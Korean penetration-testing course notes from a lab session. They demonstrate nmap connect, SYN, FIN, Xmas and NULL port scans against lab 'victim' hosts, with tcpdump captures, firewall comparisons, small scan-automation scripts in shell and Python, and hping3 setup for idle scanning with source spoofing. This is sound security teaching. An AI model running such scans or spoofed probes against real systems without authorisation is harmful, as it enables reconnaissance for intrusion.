모의해킹 - 4 (교육 73일차)

실습> sysinternals suite 다운로드

보안전문가나 관리자들을 필수로 사용하는 윈도우용 무료 툴
https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

procexp64.exe
Ctrl + Shift + ESC: 작업관리자 단축키
작업관리자 대체: Options > Replace Task Manager

procexp64.exe 는 virustotal 과 연동해서 사용이 가능하다.

악성코드를 검사해주는 사이트: 전세계 백신이 모여있다.
https://www.virustotal.com/

tcpview64.exe: 윈도우용 netstat or ss

실습> TCP Connect Scan(-sT)

방화벽이 없을 때 

[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# iptables -F
[root@victim3 ~]# systemctl start httpd
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

열린 포트 스캔
       S
A -----------> V3
       SA
A <----------- V3
       A
A -----------> V3
       R/A
A -----------> V3

[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:06 EST
Nmap scan report for 200.200.200.6
Host is up (0.00030s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:04:42.002757 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [S], seq 1703896547, win 64240, options [mss 1460,sackOK,TS val 284899562 ecr 0,nop,wscale 7], length 0
18:04:42.002787 IP 200.200.200.6.80 > 200.200.200.3.53946: Flags [S.], seq 4262865332, ack 1703896548, win 28960, options [mss 1460,sackOK,TS val 107808245 ecr 284899562,nop,wscale 7], length 0
18:04:42.003036 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0
18:04:42.003098 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 284899562 ecr 107808245], length 0


닫힌 포트 스캔
       S
A -----------> V3
       R/A
A <----------- V3

[root@kali ~]# nmap -sT -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:12 EST
Nmap scan report for 200.200.200.6
Host is up (0.00029s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:11:12.160565 IP 200.200.200.3.45958 > 200.200.200.6.1: Flags [S], seq 377962957, win 64240, options [mss 1460,sackOK,TS val 285259704 ecr 0,nop,wscale 7], length 0
18:11:12.160590 IP 200.200.200.6.1 > 200.200.200.3.45958: Flags [R.], seq 0, ack 377962958, win 0, length 0

실습> TCP Stealth Scan(-sS)

방화벽이 없을 때 


열린 포트 스캔
       S
A -----------> V3
       SA
A <----------- V3
       R
A -----------> V3

[root@kali ~]# nmap -sS -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:16 EST
Nmap scan report for 200.200.200.6
Host is up (0.00034s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:15:15.210783 IP 200.200.200.3.48645 > 200.200.200.6.80: Flags [S], seq 2816880098, win 1024, options [mss 1460], length 0
18:15:15.210819 IP 200.200.200.6.80 > 200.200.200.3.48645: Flags [S.], seq 718386699, ack 2816880099, win 29200, options [mss 1460], length 0
18:15:15.211607 IP 200.200.200.3.48645 > 200.200.200.6.80: Flags [R], seq 2816880099, win 0, length 0


닫힌 포트 스캔
       S
A -----------> V3
       R/A
A <----------- V3
[root@kali ~]# nmap -sS -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:19 EST
Nmap scan report for 200.200.200.6
Host is up (0.00022s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:18:05.086850 IP 200.200.200.3.35381 > 200.200.200.6.1: Flags [S], seq 883727068, win 1024, options [mss 1460], length 0
18:18:05.086880 IP 200.200.200.6.1 > 200.200.200.3.35381: Flags [R.], seq 0, ack 883727069, win 0, length 0

실습> TCP FIN Scan(-sF)

열린 포트 스캔
       F
A -----------> V3
       F
A -----------> V3

[root@kali ~]# nmap -sF -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:22 EST
Nmap scan report for 200.200.200.6
Host is up (0.00028s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:22:05.668514 IP 200.200.200.3.53541 > 200.200.200.6.80: Flags [F], seq 1234463521, win 1024, length 0
18:22:05.777554 IP 200.200.200.3.53543 > 200.200.200.6.80: Flags [F], seq 1234594595, win 1024, length 0

닫힌 포트 스캔
       F
A -----------> V3
       R/A
A <----------- V3
[root@kali ~]# nmap -sF -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:25 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:24:51.250467 IP 200.200.200.3.62479 > 200.200.200.6.1: Flags [F], seq 1606772599, win 1024, length 0
18:24:51.250498 IP 200.200.200.6.1 > 200.200.200.3.62479: Flags [R.], seq 0, ack 1606772600, win 0, length 0

실습> TCP X-MAS Scan(-sX)

열린 포트 스캔
     FPU
A -----------> V3
     FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:28 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:28:38.241427 IP 200.200.200.3.33504 > 200.200.200.6.80: Flags [FPU], seq 1165601945, win 1024, urg 0, length 0
18:28:38.350225 IP 200.200.200.3.33506 > 200.200.200.6.80: Flags [FPU], seq 1165733019, win 1024, urg 0, length 0

닫힌 포트 스캔
      FPU
A -----------> V3
      R/A
A <----------- V3

[root@kali ~]# nmap -sX -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:34 EST
Nmap scan report for 200.200.200.6
Host is up (0.00019s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:34:41.537399 IP 200.200.200.3.34788 > 200.200.200.6.1: Flags [FPU], seq 3973353575, win 1024, urg 0, length 0
18:34:41.537429 IP 200.200.200.6.1 > 200.200.200.3.34788: Flags [R.], seq 0, ack 3973353576, win 0, length 0

실습> TCP NULL Scan(-sN)

열린 포트 스캔   
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:30 EST
Nmap scan report for 200.200.200.6
Host is up (0.00027s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:34:58.917885 IP 200.200.200.3.36882 > 200.200.200.6.80: Flags [none], win 1024, length 0
19:34:59.026348 IP 200.200.200.3.36884 > 200.200.200.6.80: Flags [none], win 1024, length 0


닫힌 포트 스캔
A -----------> V3
      R/A
A <----------- V3
[root@kali ~]# nmap -sN -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:31 EST
Nmap scan report for 200.200.200.6
Host is up (0.00035s latency).

PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:37:01.895079 IP 200.200.200.3.34067 > 200.200.200.6.1: Flags [none], win 1024, length 0
19:37:01.895110 IP 200.200.200.6.1 > 200.200.200.3.34067: Flags [R.], seq 0, ack 3100874977, win 0, length 0

실습> TCP Connect Scan(-sT)

방화벽이 있을 때 

[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# systemctl disable firewalld
[root@victim3 ~]# yum -y install iptables-services
[root@victim3 ~]# vi /etc/sysconfig/iptables
# sample configuration for iptables service
# you can edit this manually or use system-config-firewall
# please do not ask us to add additional ports/services to this default configuration
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -j DROP
COMMIT

[root@victim3 ~]# iptables-restore /etc/sysconfig/iptables
[root@victim3 ~]# iptables -nL
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:80
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           
DROP       all  --  0.0.0.0/0            0.0.0.0/0           

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination        

[root@victim3 ~]# systemctl start httpd
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

열린 포트 스캔
       S
A -----------> V3
       SA
A <----------- V3
       A
A -----------> V3
       R/A
A -----------> V3

[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00025s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:45:46.982247 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [S], seq 3778980217, win 64240, options [mss 1460,sackOK,TS val 290497951 ecr 0,nop,wscale 7], length 0
19:45:46.982286 IP 200.200.200.6.80 > 200.200.200.3.49118: Flags [S.], seq 1467186253, ack 3778980218, win 28960, options [mss 1460,sackOK,TS val 113873225 ecr 290497951,nop,wscale 7], length 0
19:45:46.982485 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 290497952 ecr 113873225], length 0
19:45:46.982531 IP 200.200.200.3.49118 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 290497952 ecr 113873225], length 0


닫힌 포트 스캔
       S
A -----------> V3
       S
A -----------> V3  

[root@kali ~]# nmap -sT -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:41 EST
Nmap scan report for 200.200.200.6
Host is up (0.00071s latency).

PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

방화벽에서 닫힌 포트 1번 패킷을 DROP하기 때문에 RST 패킷이 오지 않는다.
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:47:21.221882 IP 200.200.200.3.45334 > 200.200.200.6.1: Flags [S], seq 2893359925, win 64240, options [mss 1460,sackOK,TS val 290584941 ecr 0,nop,wscale 7], length 0
19:47:21.328656 IP 200.200.200.3.45340 > 200.200.200.6.1: Flags [S], seq 2798182175, win 64240, options [mss 1460,sackOK,TS val 290585039 ecr 0,nop,wscale 7], length 0

실습> TCP Stealth Scan(-sS)

방화벽이 없을 때 


열린 포트 스캔
       S
A -----------> V3
       SA
A <----------- V3
       R
A -----------> V3

[root@kali ~]# nmap -sS -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:45 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:51:21.853228 IP 200.200.200.3.51545 > 200.200.200.6.80: Flags [S], seq 3422609856, win 1024, options [mss 1460], length 0
19:51:21.853279 IP 200.200.200.6.80 > 200.200.200.3.51545: Flags [S.], seq 2702628379, ack 3422609857, win 29200, options [mss 1460], length 0
19:51:21.853536 IP 200.200.200.3.51545 > 200.200.200.6.80: Flags [R], seq 3422609857, win 0, length 0


닫힌 포트 스캔
       S
A -----------> V3
       S
A -----------> V3  
[root@kali ~]# nmap -sS -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:46 EST
Nmap scan report for 200.200.200.6
Host is up (0.00021s latency).

PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:52:20.778022 IP 200.200.200.3.44083 > 200.200.200.6.1: Flags [S], seq 2147615859, win 1024, options [mss 1460], length 0
19:52:20.886994 IP 200.200.200.3.44085 > 200.200.200.6.1: Flags [S], seq 2147484785, win 1024, options [mss 1460], length 0

실습> TCP FIN Scan(-sF)

열린 포트 스캔
       F
A -----------> V3
       F
A -----------> V3
[root@kali ~]# nmap -sF -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:47 EST
Nmap scan report for 200.200.200.6
Host is up (0.00089s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:54:30.224476 IP 200.200.200.3.54405 > 200.200.200.6.1: Flags [F], seq 3549946888, win 1024, length 0
19:54:30.333396 IP 200.200.200.3.54407 > 200.200.200.6.1: Flags [F], seq 3549815818, win 1024, length 0

닫힌 포트 스캔
       F
A -----------> V3
       F
A -----------> V3  
[root@kali ~]# nmap -sF -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 21:48 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
19:54:30.224476 IP 200.200.200.3.54405 > 200.200.200.6.1: Flags [F], seq 3549946888, win 1024, length 0
19:54:30.333396 IP 200.200.200.3.54407 > 200.200.200.6.1: Flags [F], seq 3549815818, win 1024, length 0

실습> TCP X-MAS Scan(-sX)

열린 포트 스캔
     FPU
A -----------> V3
     FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:00 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:08:10.129604 IP 200.200.200.3.62383 > 200.200.200.6.80: Flags [FPU], seq 1138112877, win 1024, urg 0, length 0
20:08:10.239291 IP 200.200.200.3.62385 > 200.200.200.6.80: Flags [FPU], seq 1137981807, win 1024, urg 0, length 0

닫힌 포트 스캔
      FPU
A -----------> V3
      FPU
A -----------> V3

[root@kali ~]# nmap -sX -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:01 EST
Nmap scan report for 200.200.200.6
Host is up (0.00022s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:09:08.738280 IP 200.200.200.3.36118 > 200.200.200.6.1: Flags [FPU], seq 3678728697, win 1024, urg 0, length 0
20:09:08.847619 IP 200.200.200.3.36120 > 200.200.200.6.1: Flags [FPU], seq 3678859771, win 1024, urg 0, length 0

실습> TCP NULL Scan(-sN)

열린 포트 스캔   
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 80 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:02 EST
Nmap scan report for 200.200.200.6
Host is up (0.00024s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:10:08.821176 IP 200.200.200.3.48976 > 200.200.200.6.80: Flags [none], win 1024, length 0
20:10:08.930698 IP 200.200.200.3.48978 > 200.200.200.6.80: Flags [none], win 1024, length 0


닫힌 포트 스캔
A -----------> V3
A -----------> V3
[root@kali ~]# nmap -sN -p 1 200.200.200.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 22:03 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT  STATE         SERVICE
1/tcp open|filtered tcpmux
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
20:10:50.399720 IP 200.200.200.3.48730 > 200.200.200.6.1: Flags [none], win 1024, length 0
20:10:50.509321 IP 200.200.200.3.48732 > 200.200.200.6.1: Flags [none], win 1024, length 0

실습> 쉘 스크립트를 이용한 포트스캔

[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes

[root@kali ~]# vi nmap.sh 
#!/bin/sh

victimIP="200.200.200.6"
port=80

nmap -sT -p $port $victimIP
nmap -sS -p $port $victimIP
nmap -sF -p $port $victimIP
nmap -sX -p $port $victimIP

[root@kali ~]# chmod 755 nmap.sh
[root@kali ~]# ./nmap.sh 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00023s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00021s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00094s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 20:39 EST
Nmap scan report for 200.200.200.6
Host is up (0.00047s latency).

PORT   STATE         SERVICE
80/tcp open|filtered http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds


-sT -p 80 > -sS -p 80 > -sF -p 80 > -sX -p 80
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
18:40:31.618114 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [S], seq 1847757251, win 64240, options [mss 1460,sackOK,TS val 286883803 ecr 0,nop,wscale 7], length 0
18:40:31.618150 IP 200.200.200.6.80 > 200.200.200.3.46754: Flags [S.], seq 2272028085, ack 1847757252, win 28960, options [mss 1460,sackOK,TS val 109957860 ecr 286883803,nop,wscale 7], length 0
18:40:31.618350 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 286883804 ecr 109957860], length 0
18:40:31.618357 IP 200.200.200.3.46754 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, options [nop,nop,TS val 286883804 ecr 109957860], length 0
18:40:31.826141 IP 200.200.200.3.46148 > 200.200.200.6.80: Flags [S], seq 3900203970, win 1024, options [mss 1460], length 0
18:40:31.826179 IP 200.200.200.6.80 > 200.200.200.3.46148: Flags [S.], seq 2354405363, ack 3900203971, win 29200, options [mss 1460], length 0
18:40:31.826420 IP 200.200.200.3.46148 > 200.200.200.6.80: Flags [R], seq 3900203971, win 0, length 0
18:40:32.086501 IP 200.200.200.3.64343 > 200.200.200.6.80: Flags [F], seq 2635841437, win 1024, length 0
18:40:32.195950 IP 200.200.200.3.64345 > 200.200.200.6.80: Flags [F], seq 2635710367, win 1024, length 0
18:40:32.545829 IP 200.200.200.3.39989 > 200.200.200.6.80: Flags [FPU], seq 2071201281, win 1024, urg 0, length 0
18:40:32.655240 IP 200.200.200.3.39991 > 200.200.200.6.80: Flags [FPU], seq 2071332355, win 1024, urg 0, length 0

실습> 쉘 스크립트로 포트 스캐닝 스크립트 제작하기

포트 스캐닝 공격을 파일로 저장해서 와이어샤크로 분석한다.
확장자: pcap, pacapng

-w 파일명: 파일명으로 패킷이 저장

1. 소스코드 작성
[root@kali ~]# vi ./nmap.sh 
#!/bin/sh

victimIP="200.200.200.6"
port=80

scanOption="-sT -sS -sF -sX -sN"

for option in $scanOption
do
    nmap $option -p $port $victimIP
done

[root@kali ~]# chmod 755 nmap.sh 

2. 패킷 모니터링
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -w /var/www/html/totalCapture.pcap

3. 포트 스캔 공격
[root@kali ~]# ./nmap.sh 

4. 패킷 저장
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -w /var/www/html/totalCapture.pcap
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
^C11 packets captured
11 packets received by filter
0 packets dropped by kernel

5. 패킷 다운로드
Host OS에서 캡처된 패킷 파일을 다운로드 한다.
http://200.200.200.6/totcalCapture.pcap

6. 패킷 분석
와이어샤크를 실행해서 패킷을 분석한다.

실습> 파이썬 코드로 포트 스캐닝 스크립트 제작하기

1. 소스코드 작성
[root@kali ~]# vi nmap.py 
#!/bin/python3

"""
-sT: TCP Connect Scan
-sS: TCP Stealth Scan
-sF: TCP FIN Scan
-sX: TCP X-MAS Scan
-sN: TCP NULL SCAN
"""

import os

victimIP="200.200.200.6"
port=80
scanOption = ['-sT', '-sS', '-sF', '-sX', '-sN']

# print(victimIP, port, scanOption)

for option in scanOption:
    scanCommand = f'nmap {option} -p {port} {victimIP}'
    print(f'>>> {scanCommand} <<<')
    os.system(scanCommand)
    print()
else:
    print(f'{victimIP}: 포트 스캔 종료')

2. 패킷 모니터링
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

3. 포트 스캔 공격
[root@kali ~]# ./nmap.py 

4. 패킷 확인
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

실습> idle scanning

idle scanning은 다른 Victim Host를 이용해서 Victim의 포트번호를 스캔하는 방법이며 방화벽이 있으면 안되는 공격이다.

Victim1: 200.200.200.4
Victim3: 200.200.200.6
Attacker: 200.200.200.3

>>> 네트워크 환경 <<<

- Kali Linux (https://www.kali.org)
  Attacker(공격자): attacker.linuxmaster.net  200.200.200.3
- Victim1, Target1(피해자): WinXP(클라이언트)
  victim1.linuxmaster.net 200.200.200.4
- Victim2, Target2(피해자): Win7(클라이언트)
  victim2.linuxmaster.net 200.200.200.5
- Victim3, Target3(피해자): CentOS 7(서버)
  victim3.linuxmaster.net 200.200.200.6
- Victim4, Target4(피해자): BeeBox (서버)
  victim4.linuxmaster.net 200.200.200.7

   Attacker    Victim1     Victim2     Victim3     Victim4
    Kali        WinXP        Win7      CentOS7     bee-box
   +-----+     +-----+     +-----+     +-----+     +-----+
   |     |     |     |     |     |     |     |     |     |
   |     |     |     |     |     |     |     |     |     |
   +-----+     +-----+     +-----+     +-----+     +-----+
      |           |           |           |           |
------+-----------+-----------+-----------+-----------+-------
     .3          .4          .5          .6          .7

                       200.200.200.0/24



>>> 소스코드 다운로드 참고 <<<
C언어로 작성되어 있으므로 분석하면 좋다.
https://www.kali.org/tools/hping3/ ->  Source Code Repository
# vi /etc/resolv.conf 
nameserver 168.126.63.1

C 소스코드를 받아서 분석한다.
[root@kali ~]# mkdir hping3; cd hping3
[root@kali hping3]# apt -y install libpcap-dev
[root@kali hping3]# ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
[root@kali hping3]# git clone https://salsa.debian.org/debian/hping3.git .
[root@kali hping3]# ./configure
[root@kali hping3]# make  <-- 에러 발생 시 구글에서 찾아서 해결
[root@kali hping3]# cd

hping3 의 옵션
-S : SYN flag 설정
-A : ACK flag 설정
-p : 목적지 포트
-a : 소스 IP 속이기 (spoofing)
-r : id 모니터링
-c : 패킷 카운트

[root@kali ~]# hping3 --help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood	   sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
